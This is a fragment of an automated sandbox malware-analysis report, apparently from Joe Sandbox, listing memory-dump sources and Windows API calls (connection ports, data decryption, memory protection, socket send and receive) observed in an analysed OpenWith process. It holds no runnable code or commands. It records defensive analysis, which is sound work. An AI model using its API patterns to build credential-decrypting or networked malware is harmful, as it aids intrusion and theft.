                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: CryptDataUnprotect
                        • String ID:
                        • API String ID: 834300711-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: DriveLogicalStrings
                        • String ID:
                        • API String ID: 2022863570-0
                        APIs
                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000025B14E21E16), ref: 0000025B14E21640
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF41F04220C), ref: 00007DF41F058DBE
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        • GetSystemInfo.KERNELBASE(?,00007DF41F0C8C07,?,?,?,?,00000000,00000000), ref: 00007DF41F0B7361
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: rE\
                        • API String ID: 544645111-988334199
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AllocateHeap$BoundaryDeleteDescriptor
                        • String ID: l
                        • API String ID: 2279964584-2517025534

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-3916222277

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg$??3@
                        • String ID:
                        • API String ID: 2216462316-0

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                        • String ID:
                        • API String ID: 1455841399-0

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg$??3@
                        • String ID:
                        • API String ID: 2216462316-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Virtual$AllocProtect
                        • String ID:
                        • API String ID: 2447062925-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Path$??3@AcceptConnectNameName_Port_calloc_dbg_malloc_dbg
                        • String ID:
                        • API String ID: 3068672202-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _calloc_dbg
                        • String ID:
                        • API String ID: 1170608187-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Recv
                        • String ID:
                        • API String ID: 4192927123-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Send
                        • String ID:
                        • API String ID: 121738739-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort_malloc_dbg
                        • String ID:
                        • API String ID: 2831898825-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _calloc_dbg
                        • String ID:
                        • API String ID: 1170608187-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ErrorFunctionModeTable
                        • String ID:
                        • API String ID: 928017140-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: setsockopt
                        • String ID:
                        • API String ID: 3981526788-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: MitigationPolicyProcess
                        • String ID:
                        • API String ID: 1088084561-0
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF41F05382D,?,?,?,?,?,?,-00000002,00007DF41F0538CF), ref: 00007DF41F106AB9
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF41F04B707), ref: 00007DF41F04A16B
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        • _malloc_dbg.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF41F0353BE), ref: 00007DF41F035375
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: ExceptionHandlerRemoveVectored
                        • String ID:
                        • API String ID: 1340492425-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AddressCallerProc
                        • String ID:
                        • API String ID: 2663294120-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: setsockopt
                        • String ID:
                        • API String ID: 3981526788-0
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000008,00007DF41F10E721,?,?,?,?,?,?,?,00007DF41F1069C1), ref: 00007DF41F113337
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: FunctionTable
                        • String ID:
                        • API String ID: 1252446317-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: lstrcmpi
                        • String ID:
                        • API String ID: 1586166983-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333698847.00007DF41F177000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F177000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f177000_OpenWith.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: